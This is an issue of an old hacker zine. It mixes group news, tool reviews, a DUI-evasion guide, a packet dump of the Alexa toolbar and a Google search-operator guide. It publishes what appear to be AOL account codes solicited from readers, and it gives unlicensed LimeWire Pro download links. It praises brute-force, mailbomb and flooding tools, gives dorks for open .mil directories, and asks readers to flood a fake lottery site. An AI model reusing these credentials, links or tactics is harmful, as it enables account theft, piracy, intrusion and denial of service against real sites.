=========== =============== =================

=========== =============== =================

=== ==== =====
=== ==== =====
=== ==== =====
=== ==== =====
=== ==== =====
=== ==== =====
=== ==== =====
=== ==== =====
=== =============== =================
=== =============== =================

issue 04
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
in this issue: <|
department of corrections <|
limewire pro 4 all <|
reviews <|
getting out of duis <|
links <|
webcam directory update <|
alexa spyware+project info <|
google mining guide <|
antidote update <|
php-fusion exploit <|
robot files with access diver <|
bellsouth doc droppage <|
webcam update <|
spread lynn-cisco project <|
the realist's manifesto <|
mail.b0x <|
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|

=================
= corrections =
=================
current members:

sheepbyte [sheepbyte@gmail.com] aka: w0oleater in irc sometimes

zraith [zraith@gmail.com]
a3kton [a3kton@gmail.com]
smyle [wide.smyle@gmail.com]
billy hoyle [hoyle.billy@gmail.com]
lexdyisc [yaj.yake@gmail.com]
easyex [easyex@gmail.com]

we have a new irc channel. check it out at rizon.net|#tiz

you must be registered to use the channel. to register type:
/msg nickserv register password [email]

please welcome our new member easyex of dark-assassins.com!!!

special thanks to minion and cypress for all the hosting they have been giving us.
thanks to lexdyisc for the radio plug on his show le radio:
http://www.podcastindubator.com/leradio
episode three just got released so check it out!

looks like somebody blogged the nasa directory *happy dance*

http://thepheds.blogspot.com/

we still need your aol cd passwords. please send them to sheepbyte@gmail.com

you will be kept anonymous on request.
current contributors are:
matt
bracket
invision260
*special thanks to matt for his contributions*

7j-7193-5396
curls-guided
7h-jxfd-x469
trails-gallop
7j-6404-1115
flies-pour
3h-jxpl-p552
spins-cube
7j-6774-1063
monied-visas
0h-jx4y-g424
cool-play
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6774-1060
lyes-vernal
5h-jx6k-3017
border-anchor
7j-6774-1069
phoned-ward
9h-jx6v-u522
desert-petite
7j-6354-6766
field-capper
2h-jxkc-h695
pink-level
7j-7854-2215
hawked-polers
0h-jx7f-v517
puzzle-venus

do you have something to say? send it to sheepbyte@gmail.com

we still need articles, send them to sheepbyte@gmail.com
thanks to everybody who made issue 04 possible!
===============================
= limewire pro for all =
===============================
by anonymous

directory snooping on limewire, found the latest pro downloads for the following
operating
systems: windows, mac osx, mac

classic, linux (rpm), other (os/2, solaris, linux).

of course you should buy a copy and not just download it without paying! this is
just to show
you what you can get from

snooping around a web directory.

filenames:

windows: limewirewin.exe
mac osx: limewireosx.dmg
mac classic (frozen at 4.0): limewiremac.bin
linux (rpm): limewirelinux.rpm
other (os/2, solaris, linux): limewireother.zip

mirrors:

http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/
http://sales.limewire.com/041225/fkzbpt8eru3r2jrmge1hr7adqr3bkzk3/beta/

there is also: http://www9.limewire.com/download/ - just add on the filename.

isn't directory snooping fun? well, as we said you should buy a copy not just
download it! we
are in no way responsible if

you download a copy, what ever you do is your responsibility.

===============
= reviews =
===============
access diver [accessdiver.com] 5/5
this is an awesome cracking tool. it has automated site scans, http brute forcing,
form
bruting,
word list editor, word list duplicate remover, proxy leecher, proxy scanner,
proxy analyzer, and many other awesome tools. i would highly recommend this
software for
anybody
looking for some good cracking software. it is free software which is a big plus
in my book.

advanced rar password recovery (arpr) [elcomsoft.com] 4/5

this is really good rar cracking software. it is shareware so it gets a minus one
but it gets
the job done. it also recovers other archive passwords. so many rar files are
protected so
this is software that you will

find very handy.

mac makeup 1.7 [http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp] 4/5

this is nice free software to change your mac address. it didn't pick up all the
cards i
tested it on but it did pick up

some. it automatically filters out virtual addresses and can change it based on
which company
you want to make it look like

made it.
"1net corporation ;003070
2wire, inc ;000d72
2wire, inc. ;00d09e
360 systems ;000556
360sun digital broadband corporation ;000e60
"
the config file is absolutely huge because of all the mac addresses. this is
really nice
software and it gets the job done.

foxit pdf reader [foxitsoftware.com] 5/5

this is a great stand-alone pdf reader for windows. it's free and it works. the
reason i got
this was because i didn't want

all the crap adobe throws on your system so i found this one. it is nice scumware
free
software and will even set itself as

the default reader if you want it to.

stc 3.0 [kryptokrew.de] 4/5

this is a nice multi-hack tool. it has lots of neat features. i took one point off
because it
doesn't feature proxy support.

features:
.httaccess brute forcer
anonymous ftp scanner
bios master passwords
cd player
cgi vuln. scanner
country codes (.de etc)
dictionary generator
dns and reverse dns lookup
domain scanner (portscanner)
file compare
ftp brute forcer
get server services
get cached passwords
hex/dec/bin/ascii converter
html grabber
irc brute forcer
irc flooder
link-looker
netbios password cracker
secure password generator
ping/traceroute
port2service [what services use which port]
portflooder
portscanner
local port checker
port watcher
screensaver cracker
simple mail (can use to mailbomb with anonymous mail servers)
oob nuker
telnet brute forcer
whois info

========================
= getting out of duis =
==by: sheepbyte=========

duis can be a tough battle to fight. if you are guilty and it didn't happen as an
accident do
not use these techniques. you

should go straight to jail. that being said, the tests for drunk driving can be
very
inaccurate and as a result may get you

in for something you haven't done. if you get pulled over make sure you have your
papers and
all your information in the

glove compartment and you know where they are. if you look like you know what you
are doing
then you will look less drunk and

you may avoid a test. the officer will probably ask if you have had anything to
drink. there
are several paths you could take

here. outright saying no will raise a red flag because you probably weren't
driving well in
the first place. you may choose

to say you had some to drink with your friends, but you thought you had less than
the legal
limit. remember: don't be

defensive, be courteous. you could say that you think you may have had too much to
drink and
that you are tired. casually

mention that you think it would be best if you didn't drive anymore and the
officer may offer
you a ride home. you may even

request a safe ride, and most officers won't deny you a ride if you say you
shouldn't be on
the road because it makes them

liable. if he does then take this option!!!!! this will get you home and off
clean. don't be
afraid to ride with the officer
as this won't hurt you. if he arrests you, you are a whole other league and i
won't cover
that. some people think drinking

listerine will work and in some cases it does. this only works in some states. in
many states
this will only get the officer

mad that you are trying to lie to him and he will do everything to get you in
trouble. at some
point during the questioning

he will ask you if you have any weapons. if you have weapons tell him so. lying
about this can
land you some time in jail.
remember these tips:
1. look organized
2. don't lie about weapons
3. don't be defensive
4. be courteous and respectful
5. if he offers, take the ride home.
many people get caught in the dui dragnet and hopefully this will help you. again,
if you are
driving drunk and were being

stupid or had it happen before then go to jail and learn your lesson.

===============
= links =
===============
[reverse-engineering.net]
this site has some good resources and a cool forum.

[reteam.org]
this is a good reverse engineering site with some nice forums. it's l337 so go!

[pandora-security.com]
an awesome site i found out about through irc. this is true hacking none of this
cracking or
botnet shit. run by my good friend 34109!

[bash.org]
funny stuff from irc. vote for your favorite.

[phrack.org]
phrack 63 is out so download it and read it.

[http://thedigitalremix.com/remixradio/]
a new hacker radio show that i've been watching. looks like it will be pretty
cool. i got
interviewed so it should be

uber-leet.
[shellcoders.com]
a site about programming and hacking by my friend sintigan. anybody who is
registered is
uber-leet so check it out.

[http://www.2600.com/photos/]
was coley trying to start an image gallery?

===============
= webcam =
= directory =
===============
we are closing down the webcam directory. it looks as if nobody is contributing so
there is no
reason to keep it up. we may re-launch it at a later time.

===============
= alexa =
= + =
= spyice =
===============
we are starting a new project at the antidote which will be a new approach to
spyware. instead
of simply defending users

against spyware this software will take an offensive against the

databases which track us. this software will take action and not passively play a
game of cat
and mouse. my first project was investigating the alexa toolbar software. what you
are about
to
see is very scary. i was genuinely scared by what i saw here. this is only 10% of
what this
software can do. i have yet to analyze my firewall logs which will reveal more
information
about
what may be in the raw tcp packets.

this goes to what appears to be the page ranker. i'm not sure quite how it works
but here is
part of the packet dump. any areas covered with xs may be private or revealing
information.
if you can't tell i was using ie6 infected with alexa toolbar 7.0. this has to be
the first
time i have deliberately installed such scum on my machine.

request to: data.alexa.com

0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 02 14 76 86 40 00 80 06 02 46 c0 a8 00 1c d1 ed ..v.@....f......
0020 ed 65 13 24 00 50 67 b0 a0 d6 a7 0c 9e 41 50 18 .e.$.pg......ap.
0030 42 30 87 ef 00 00 47 45 54 20 2f 64 61 74 61 2f b0....get /data/
0040 72 31 77 55 32 31 69 6c 57 57 78 32 57 7a 3f 63 r1wu21ilwwx2wz?c
0050 6c 69 3d 31 30 26 64 61 74 3d 73 6e 62 61 26 76 li=10&dat=snba&v
0060 65 72 3d 37 2e 30 26 63 64 74 3d 61 6c 78 5f 76 er=7.0&cdt=alx_v
0070 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0080 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0090 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxguid??xxxxx
00a0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
00b0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
00c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
00d0 72 71 25 33 44 30 26 75 72 6c 3d 68 74 74 70 3a rq%3d0&url=http:
00e0 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 20 48 //www.msn.com/ h
00f0 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a ttp/1.1..accept:
0100 20 2a 2f 2a 0d 0a 41 63 63 65 70 74 2d 45 6e 63 */*..accept-enc
0110 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 oding: gzip, def
0120 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 late..user-agent
0130 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 : mozilla/4.0 (c
0140 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 ompatible; msie
0150 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 6.0; windows nt
0160 35 2e 31 3b 20 2e 4e 45 54 20 43 4c 52 20 31 2e 5.1; .net clr 1.
0170 31 2e 34 33 32 32 3b 20 41 6c 65 78 61 20 54 6f 1.4322; alexa to
0180 6f 6c 62 61 72 29 0d 0a 48 6f 73 74 3a 20 64 61 olbar)..host: da
0190 74 61 2e 61 6c 65 78 61 2e 63 6f 6d 0d 0a 43 6f ta.alexa.com..co
01a0 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 nnection: keep-a
01b0 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 41 56 live..cookie: av
01c0 5f 63 63 4c 6f 61 64 3d 66 61 6c 73 65 3b 20 74 _ccload=false; t
01d0 77 79 6d 36 35 5f 64 69 73 61 62 6c 65 64 3d 66 wym65_disabled=f
01e0 61 6c 73 65 3b 20 74 77 79 6d 36 35 3d 44 31 41 alse; twym65=d1a
01f0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxguidxxxxxxxx
0200 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxguidxxxxx; al
0210 65 78 61 56 65 72 73 69 6f 6e 3d 37 2e 30 0d 0a exaversion=7.0..
0220 0d 0a ..

cookie data: (client.alexa.com)

0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 97 77 2d 40 00 80 06 02 21 c0 a8 00 1c d1 ed ..w-@....!......
0020 ed 60 13 37 00 50 68 e2 51 aa e8 bf af cc 50 18 .`.7.ph.q.....p.
0030 42 30 ff 2c 00 00 47 45 54 20 2f 64 65 74 61 69 b0.,..get /detai
0040 6c 73 2f 69 6d 61 67 65 73 2f 73 74 61 72 73 2d ls/images/stars-
0050 34 2d 35 2e 67 69 66 20 48 54 54 50 2f 31 2e 31 4-5.gif http/1.1
0060 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 41 ..accept: */*..a
0070 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 ccept-language:
0080 65 6e 2d 75 73 0d 0a 41 63 63 65 70 74 2d 45 6e en-us..accept-en
0090 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 coding: gzip, de
00a0 66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e flate..user-agen
00b0 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 t: mozilla/4.0 (
00c0 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 compatible; msie
00d0 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 6.0; windows nt
00e0 20 35 2e 31 3b 20 2e 4e 45 54 20 43 4c 52 20 31 5.1; .net clr 1
00f0 2e 31 2e 34 33 32 32 3b 20 41 6c 65 78 61 20 54 .1.4322; alexa t
0100 6f 6f 6c 62 61 72 29 0d 0a 48 6f 73 74 3a 20 63 oolbar)..host: c
0110 6c 69 65 6e 74 2e 61 6c 65 78 61 2e 63 6f 6d 0d lient.alexa.com.
0120 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 .connection: kee
0130 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a p-alive..cookie:
0140 20 41 56 5f 63 63 4c 6f 61 64 3d 66 61 6c 73 65 av_ccload=false
0150 3b 20 74 77 79 6d 36 35 5f 64 69 73 61 62 6c 65 ; twym65_disable
0160 64 3d 66 61 6c 73 65 3b 20 74 77 79 6d 36 35 3d d=false; xxxxxxx
0170 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxguidxxxxxx
0180 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0190 20 41 6c 65 78 61 56 65 72 73 69 6f 6e 3d 37 2e alexaversion=7.
01a0 30 0d 0a 0d 0a 0....

another cookie:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 3f 6e 61 3d 31 31 35 34 26 6e 63 3d 31 30 30 30 ?na=1154&nc=1000
0050 39 26 64 69 3d 33 34 30 26 70 69 3d 37 33 31 37 xxxxxxxxxxxxxxxx
0060 26 50 53 3d 38 33 39 36 37 26 54 50 3d 68 74 74 xxxxxguidxxxxxxx
0070 70 25 33 61 25 32 66 25 32 66 77 77 77 2e 6d 73 xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx =v=2&guid=xxxxxx
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxguidxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxx; spee
01e0 44 3d 42 0d 0a 0d 0a d=b....

url request:
0000 00 09 5b 85 81 34 00 c0 fe 01 01 01 08 00 45 00 ..[..4........e.
0010 01 d9 76 96 40 00 80 06 f3 ef c0 a8 00 1c 41 36 ..v.@.........a6
0020 8c 9e 13 28 00 50 67 b1 8d 9d 53 be 41 e8 50 18 ...(.pg...s.a.p.
0030 42 30 0d 09 00 00 47 45 54 20 2f 63 2e 67 69 66 b0....get /c.gif
0040 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0050 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0060 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0070 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
0080 6e 2e 63 6f 6d 25 32 66 64 65 66 61 75 6c 74 2e n.com%2fdefault.
0090 61 72 6d 78 20 48 54 54 50 2f 31 2e 31 0d 0a 41 armx http/1.1..a
00a0 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a 52 65 66 65 ccept: */*..refe
00b0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e rer: http://www.
00c0 6d 73 6e 2e 63 6f 6d 2f 0d 0a 41 63 63 65 70 74 msn.com/..accept
00d0 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 75 73 -language: en-us
00e0 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e ..accept-encodin
00f0 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 g: gzip, deflate
0100 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f ..user-agent: mo
0110 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 zilla/4.0 (compa
0120 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b tible; msie 6.0;
0130 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b windows nt 5.1;
0140 20 2e 4e 45 54 20 43 4c 52 20 31 2e 31 2e 34 33 .net clr 1.1.43
0150 32 32 3b 20 41 6c 65 78 61 20 54 6f 6f 6c 62 61 22; alexa toolba
0160 72 29 0d 0a 48 6f 73 74 3a 20 63 2e 6d 73 6e 2e r)..host: c.msn.
0170 63 6f 6d 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a com..connection:
0180 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f keep-alive..coo
0190 6b 69 65 3a 20 43 55 4c 54 55 52 45 3d 65 6e 2d kie: culture=en-
01a0 55 53 3b 20 6d 68 3d 4d 53 46 54 3b 20 4d 43 31 us; mh=msft; mc1
01b0 3d 56 3d 32 26 47 55 49 44 3d 62 61 66 30 34 63 =v=2&guid=x
01c0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01d0 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
01e0 44 3d 42 0d 0a 0d 0a d=b....

here are the changes it made to my system during the install. again xxxxxs
indicate bleeped
out information. i tracked this information with total-uninstall 3.0. which is
really great
software. i'm not including things like temp files and modifications to system
logs in this.
a clsid is the equivalents of a guid.

it added c:\program files\alexa toolbar\uninstall.exe

it added c:\windows\system32\alxres.dll which is a bho.
it added c:\windows\system32\alxtb1.dll which is a bho.
it added hkey_classes_root\alxtb.bho.1
it added hkey_classes_root\alxtb.bho.1\clsid
it added hkey_classes_root\alxtb.bho.1\clsid\(default) which contains the clsid
it added hkey_classes_root\alxtb.bho.1\(default)
it added hkey_classes_root\alxtb.bho
it added hkey_classes_root\alxtb.bho\clsid
it added hkey_classes_root\alxtb.bho\clsid\(default) which contains a clsid
it added hkey_classes_root\alxtb.bho\curver
it added hkey_classes_root\alxtb.bho\curver\(default)
it added hkey_classes_root\alxtb.bho\(default)
it added 6 clsids to hkey_classes_root\clsid
from this point on i won't include clsids because it would take pages and pages to
document
them all. this only leaves to wonder why they need so many different ones...
it added a bunch of settings and menus with their own clsids to the registry
it modified hkey_current_user\software\microsoft\internet
explorer\extensions\cmdmapping\nextid
it added 5 items to hkey_current_user\software\microsoft\internet explorer\menuext
it changed hkey_current_user\software\microsoft\internet
explorer\toolbar\webbrowser\itbarlayout
it added a ton of preferences under
hkey_current_user\software\microsoft\office\11.0\common\research\sources
it added preferences under hkey_local_machine\software\alexa internet
it added hkey_local_machine\software\alexa toolbar
it added
hkey_local_machine\software\microsoft\windows\currentversion\uninstall\alexa
toolbar
that is only a short preview of the things that it added. i didn't include a lot
of clsid
related things because there are too many and i left out some empty keys or just
included key
folders. i will be releasing a removal tool for the tool bar soon so expect to see
that. it
will
probably be a dos batch file.
a full list of system changes can be found here:
http://securityresponse.symantec.com/avcenter/venc/data/spyware.alexa.html

it looks like they use web bugs to track users and things like
.gif?guid=xxxxx&requestip=xxxx
and it goes on like that. i was un-able to decode the tcp packets. it detected my
brand of
computer and told alexa what it was. this software is very scary and bonzi/gator
can only be
worse. a lesson here can be learned that you need to be careful with what you
download, run,
and let slip through your network.

anybody who knows anything about spyware or can code and would be willing to
participate
please
contact us. we need inside sources to tell us what all this means!! basically we
will be using
their techniques against them. we will spam the spyware databases with either
random data,
data with a message, or realistic-looking bullshit. we haven't decided quite how
this project
will end up, so we are still planning. the ~blindnet~ project will be on hold
until we get
this off to a good start. we might start a sourceforge project for this. it will
probably be
in c or a c variant and will run on win32/*nix systems. the information we find
out will all
be available online on a website containing information about these *evil*
companies in a
somewhat open format (almost a wiki). again, if you would like to help please drop
an email
to:
sheepbyte@gmail.com

currently the developers are all the people in the antidote.

================
= the =
= google =
= mining =
 = guide =
= by: =
= sheepbyte =
= i'm @ gmail! =
================
what is google mining
commands
exploitation
resources
problems with it
corporate responsibility
conclusion

what is google mining

----------------------
google mining is the art of exploiting google features to find information. google
indexes
thousands of pages on the web and many of them were not meant to be indexed. a
large part of
hacking is finding information and that is exactly what google mining does. this
article will
go into detail and give examples of google mining. this is a skill you will use
not only in
hacking but every time you search for something.

commands
---------
""
intitle:
inurl:
intext:
insite:
cache:
link:
related:
info:
definition:
stocks:
filetype:
movie:
fcc
patent

""
quotes can help you specify blocks of text. let's say you i'm ego-oogling on my
zine. i would
type "the intrahack zine" and get results only pertaining to it. if i typed in the
intrahack
zine i would get pages containing these combinations of words:
the
intrahack
zine
the intrahack
the zine
intrahack zine
that isn't very efficient is it? let's say i'm looking for manuals for the glass
front vendor
by dixie-narco. i could use this query:
"dixie-narco" "glass front" "manual"
if you go under advanced mode you can make sure all those terms are in the page.

intitle:
the intitle command ensure that something is in the title. let's say you are
looking for a
copy
of freedom downtime. you could type:
intitle:"index of /" "freedom" "downtime" ".avi"
this is a fairly insufficient search but we will get into more complicated
commands.
the key part to the above search is the intitle:"index of /" this makes sure the
file is in an
open ftp directory. some sites will spoof this, but generally you will get good
results. if
you want to look for a page with

information about hacking and phreaking use allintitle:hacking phreaking.

inurl:
the inurl: function allows you to specify part of the url. let's say you are
looking for
"hitch" torrents. you could find blog torrent servers using this query:
inurl:/bt "hitch" "torrent"
you may not wish to add "torrent" because it will give you more hits. let's say
you want to
find
open directories on .mil sites. just use:
inurl:".mil" intitle:"index of /"
allinurl: can use multiple words.

intext:
the intext: function is pretty useless. you can already just type it in the search
box or use
quotes to achieve the same results. if you type "free porn" in google you will get
sites that
may only contain that in the title or meta tags, intext: insures it is in the
text.

insite:
the insite command can be used to search a certain site. now this is fairly
useless because
you already have the same command as insite: called inurl:. let's say you are
searching binrev
forums for a post about catsex. you could use this query:
insite:binrev.com "catsex"
you could also use the inurl: function to achieve the same results. inurl: will
turn up hits
from
archive.org and other mirrors so insite: does a little better at this. site: will
also achieve
the same effect.
cache:
you can use the cache: command to find googles cache of a site. at one point
tiz.brokenfloppy.com had no bandwidth left so you could have used
cache:tiz.brokenfloppy.com
to
see it. many pdf files and other files are available only through cache and other
archive
services. i believe you can send a request to google to remove your site but i
think you have
to find the email.

link:
this query will return all pages that link to a certain page. let's say i'm
looking for pages
that link to

tiz.brokenfloppy.com i could use link:tiz.brokenfloppy.com

this query gets no results and doesn't include links within our site like
tiz.brokenfloppy.com/directory.txt. i could use

"tiz.brokenfloppy.com" and return much more results.

related:
this query returns pages that are related to other pages. related:bellsmind.net
turns up
several good results.

info:
this returns info about a certain page or site. info:binrev.com returns some of
the news from
the site. this can also be

achieved by typing in the url directly.

definition:
this will give you the definition of a word. pretty self-explanatory. you can also
use
define:.

stocks:
this will return stock information. if you want to see multiple stocks such as
microsoft and
aol type stocks:msft aol

filetype:
the filetype: function will only return files of a certain type. let's say you are
looking for
manuals in the pdf format.

type filetype:pdf manual.

movie:
use the movie: function to find information out about a movie.

fcc
use "fcc fccid" to find fcc information on a specific device.
patent
use "patent patentnum" to find patent information.

you can also do math queries. type 5+2 and google will tell you the answer is 7.

you can also do currency conversions in this format: 3.5 usd in gbp

to get phone book information type a number in this format:

xxx-xxx-xxxx
or type the personal information in this format:
first name (or first initial), last name, city (state is optional)
first name (or first initial), last name, state
first name (or first initial), last name, area code
first name (or first initial), last name, zip code
phone number, including area code
last name, city, state
last name, zip code

to get a map of an area type the address like:

165 university ave palo alto ca

to get flight information type the info in this format:

airline flight_number
airport flight_number

to get weather type:

weather city, state

exploitation
------------
many exploits for web applications come out every day. google enables skiddies to
do mass
site defacements. let's say there is an exploit for php-nuke. what you can do is
go in to
google
and type something all the pages run by that system have in common. most cmss have
a
little "created by" thing at the bottom or something similar to it is easy to
identify sites.
once you have searched you just rip all the urls and run them through a perl
script to make
the exploit urls. exploitation and defacement is suddenly a breeze. it really
takes no skill
to deface websites with cms exploits and that is why so many people do it. they do
it to
impress their friends, to feel good about themselves, or to please their ego. if
you are doing
mass defacements you don't deserve to be part of the internet.
resources
---------
there are many places with information on google mining/hacking. for specific
queries check
out johnny.ihackstuff.com
for google mining questions contact me or go to binrev.com/forums to the google
mining
section. there is a lot more to be

learned in this area. i haven't included specific queries because it would take
thousands of
pages and would just be

worthless filler. there are some books out there on google mining and most forums
will have
members willing to help. google

is always coming out with new stuff so check out labs.google.com

this paper doesn't include all the google features, only ones you can use through
the search
box.

problems with it
----------------
the only problems with google mining that restrains you from everything are
robots.txt files
and linking. google obeys

robots.txt files which could seriously hamper your results on specific sites. if a
page
doesn't link to a page you are

looking for, google won't find it. programs like winhttrack will even look in
source to find
pages, so for site-specific

queries that might be another good if not better option.

corporate responsibility
-------------------------
where does personal responsibility end and corporate responsibility start? many
people say
google shouldn't allow users to search for exploited pages. there are several
problems with
this
proposal. first off, it would only become a race between google and the
exploiters. google is
no more capable to block exploits than people are to find and use them. there is a
system in
place called the robots.txt file to help you if you are a super-paranoid admin.
there was an
article in the most recent 2600

about getting out of google if you are a concerned webmaster.

i personally don't believe that google has any responsibility. if people are
stupid enough
to list their cmss in google and not be protected, it is their own fault.
conclusion
----------
google is a very powerful tool is used correctly. so much of hacking is based on
the finding
of information and google mining

can help you achieve just that. this article does not cover all of googles
features, it only
covers ones that can go in the

search box. using services to find things has always been a skill a hacker needs
and google is
just another service like many

other before us. from using the list command in irc to the inurl: command in
google,
information is always the goal. if you

have any questions, comments, or clarifications please feel free to email me at

sheepbyte@gmail.com

===============
= antidote =
= update =
===============
please welcome anonymous, anonymous, anonymous, anonymous, anonymous, anoynmous,
anonymous,
anonymous, and anonymous to the antidote!
we apologize for not revealing member names but as you know, this is sensitive
business.
check out our new site at:
antidote.kazasena.com
if you are a member of the lad wrecking crew of you know how to get in contact
with them
please contact us!
we had a member join by the name of phatal. he hangs out on irc at
irc.undergroundnews.com
beware! phatal is a fed! shortly after he joined one of our members couldn't
remember us or
what we had done, he left, and
never came back. in other words, arrested.
i would advise everybody to stay away from him. we had lots of weird activity
since his
joining. stay away. stay safe.

there has been lots going on in the antidote labs. we have our own members only
irc channel
now. there are several project updates you should hear. the ~blindnet project is
bieng
discontinued until further notice however, we will finish it. the spyice peoject
is still very
active as well as the anti-phishing project phishice. we have sent tons of victim
and scammer
information to the authorities.
if you would like to contribute to the project please load the current super-leech
page
against mega-buck.com a fake lottery
site. we are now doing penetration testing on a server near you! organizations,
people we like,
and special requests may get a free or discounted rate. the standard rate for a
test is 100 u.s.
if we don't find any vulnerabilities you pay n-o-t-h-i-n-g! email
sheepbyte@gmail.com for more
information or catch him at the tiz irc channel.

